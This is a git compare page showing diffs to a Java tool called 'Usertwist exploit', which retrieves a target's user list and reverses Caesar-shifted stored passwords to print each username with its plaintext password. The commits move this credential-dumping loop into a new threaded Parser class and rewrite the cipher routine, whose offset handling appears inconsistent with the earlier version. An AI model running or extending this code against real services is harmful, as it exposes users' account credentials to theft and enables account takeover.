Compare commits
3 Commits
7207b3dca1
...
a329a54e82
| Author | SHA1 | Date | |
|---|---|---|---|
| a329a54e82 | |||
| 91a2a983c2 | |||
| e1e4a26e62 |
@@ -1,6 +1,6 @@
|
||||
package fr.motysten.usertwist.exploit;
|
||||
|
||||
import fr.motysten.usertwist.exploit.tools.Cesar;
|
||||
import fr.motysten.usertwist.exploit.tools.Parser;
|
||||
import fr.motysten.usertwist.exploit.tools.Request;
|
||||
import org.json.JSONArray;
|
||||
import org.json.JSONObject;
|
||||
@@ -13,6 +13,7 @@ import java.io.InputStreamReader;
|
||||
import java.net.http.HttpResponse;
|
||||
import java.security.KeyManagementException;
|
||||
import java.security.NoSuchAlgorithmException;
|
||||
import java.util.Arrays;
|
||||
import java.util.HashMap;
|
||||
import java.util.Map;
|
||||
|
||||
@@ -24,10 +25,15 @@ public class Main {
|
||||
public static String port = "443";
|
||||
public static int rotation = 4;
|
||||
public static boolean insecure = false;
|
||||
public static boolean asynchronous = true;
|
||||
|
||||
public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
|
||||
BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
|
||||
|
||||
if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
|
||||
asynchronous = false;
|
||||
}
|
||||
|
||||
System.out.println("Usertwist exploit by Motysten");
|
||||
System.out.println("Please don't use for unethical purpose !\n");
|
||||
String readLine;
|
||||
@@ -124,13 +130,15 @@ public class Main {
|
||||
System.out.println(usersArray.length() + " users found !");
|
||||
System.out.println("\nDecrypting passwords...\n");
|
||||
|
||||
for (int i = 0; i < usersArray.length(); i++) {
|
||||
JSONObject user = usersArray.getJSONObject(i);
|
||||
String login = user.getString("username");
|
||||
String password = Cesar.cesarRotate(user.getString("data"), rotation);
|
||||
|
||||
System.out.println((i + 1) + ". " + login + " => " + password);
|
||||
float startTime = System.nanoTime();
|
||||
if (asynchronous) {
|
||||
Parser.asyncGetPass(usersArray, rotation);
|
||||
} else {
|
||||
Parser.getPass(usersArray, rotation);
|
||||
}
|
||||
float elapsedTime = (System.nanoTime() - startTime) / 1000000;
|
||||
System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms");
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@@ -1,33 +1,33 @@
|
||||
package fr.motysten.usertwist.exploit.tools;
|
||||
|
||||
import java.util.stream.Collectors;
|
||||
|
||||
public class Cesar {
|
||||
|
||||
public static final String LOWER_ALPHABET = "abcdefghijklmnopqrstuvwxyz";
|
||||
public static final String UPPER_ALPHABET = LOWER_ALPHABET.toUpperCase();
|
||||
public static String rotate(String input, int offset) {
|
||||
char normalizeKey = (char) (offset % 26);
|
||||
|
||||
public static String cesarRotate(String input, int offset) {
|
||||
|
||||
while (offset < 0) {
|
||||
offset += 26;
|
||||
}
|
||||
|
||||
StringBuilder output = new StringBuilder();
|
||||
|
||||
for (int i = 0; i < input.length(); i++) {
|
||||
char newChar = input.charAt(i);
|
||||
if (!Character.isDigit(input.charAt(i))) {
|
||||
int pos = LOWER_ALPHABET.indexOf(Character.toLowerCase(input.charAt(i)));
|
||||
int newPos = (pos + offset) % 26;
|
||||
if (Character.isUpperCase(input.charAt(i))) {
|
||||
newChar = UPPER_ALPHABET.charAt(newPos);
|
||||
} else {
|
||||
newChar = LOWER_ALPHABET.charAt(newPos);
|
||||
}
|
||||
}
|
||||
output.append(newChar);
|
||||
}
|
||||
|
||||
return output.toString();
|
||||
return input.chars()
|
||||
.mapToObj(c -> (char) c)
|
||||
.map(c -> {
|
||||
if (Character.isLetter(c)) {
|
||||
char base;
|
||||
if (Character.isUpperCase(c)) {
|
||||
base = 'A';
|
||||
} else {
|
||||
base = 'a';
|
||||
}
|
||||
if (offset < 0) {
|
||||
return (char) (base + (c - base + normalizeKey) % 26);
|
||||
} else {
|
||||
return (char) (base + (c - base - normalizeKey + 26) % 26);
|
||||
}
|
||||
} else {
|
||||
return c;
|
||||
}
|
||||
})
|
||||
.map(String::valueOf)
|
||||
.collect(Collectors.joining());
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
33
src/fr/motysten/usertwist/exploit/tools/Parser.java
Normal file
33
src/fr/motysten/usertwist/exploit/tools/Parser.java
Normal file
@@ -0,0 +1,33 @@
|
||||
package fr.motysten.usertwist.exploit.tools;
|
||||
|
||||
import org.json.JSONArray;
|
||||
import org.json.JSONObject;
|
||||
|
||||
public class Parser {
|
||||
|
||||
public static void getPass(JSONArray usersArray, int rotation) {
|
||||
for (int i = 0; i < usersArray.length(); i++) {
|
||||
JSONObject user = usersArray.getJSONObject(i);
|
||||
String login = user.getString("username");
|
||||
String password = Cesar.rotate(user.getString("data"), rotation);
|
||||
|
||||
System.out.println((i + 1) + ". " + login + " => " + password);
|
||||
}
|
||||
}
|
||||
|
||||
public static void asyncGetPass(JSONArray usersArray, int rotation) {
|
||||
|
||||
for (int i = 0; i < usersArray.length(); i++) {
|
||||
|
||||
int finalI = i;
|
||||
new Thread(() -> {
|
||||
JSONObject user = usersArray.getJSONObject(finalI);
|
||||
String login = user.getString("username");
|
||||
String password = Cesar.rotate(user.getString("data"), rotation);
|
||||
|
||||
System.out.println((finalI + 1) + ". " + login + " => " + password);
|
||||
}).start();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
Reference in New Issue
Block a user